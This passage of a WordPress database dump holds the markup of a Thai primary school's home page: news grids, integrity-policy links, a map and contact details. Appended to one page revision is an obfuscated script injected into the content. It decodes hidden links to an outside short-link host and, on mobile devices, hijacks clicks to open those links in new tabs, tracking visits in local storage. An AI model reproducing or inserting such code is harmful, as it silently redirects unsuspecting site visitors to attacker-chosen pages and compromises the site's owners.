900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 045-660157</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"50\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:26:54','2024-07-27 05:26:54','',14,'http://pakhaeng.ssk.in.th/?p=154',0,'revision','',0),
(155,1,'2024-07-27 12:27:35','2024-07-27 05:27:35','','rovbb','','inherit','','closed','','rovbb','','','2024-07-27 12:27:35','2024-07-27 05:27:35','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png',0,'attachment','image/png',0),
(156,1,'2024-07-27 12:27:39','2024-07-27 05:27:39','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 